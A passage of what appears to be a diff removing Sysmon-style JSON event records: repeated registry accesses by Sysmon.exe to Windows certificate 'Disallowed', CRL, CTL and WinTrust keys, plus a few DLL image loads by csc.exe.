"CTLs", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", 
- "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 
131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\SysWOW64\\ntdll.dll", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570858550000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - 
"registry_value": "CTLs", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "image_load", - "image_name": "wow64.dll", - "image_path": "C:\\Windows\\System32\\wow64.dll", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570858550000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, 
- "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - 
"registry_value": "Disallowed", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { 
- "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570858710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570858869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570858869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570858869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570858869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570858869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570858869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570858869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570858869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570858869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570858869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570858869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570858869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570858869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570858869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570858869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570858869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570858869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570858869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570858869984, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570858869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570858869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570858869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570858869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "wow64win.dll", - "image_path": "C:\\Windows\\System32\\wow64win.dll", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 
131883570858550000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570858869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 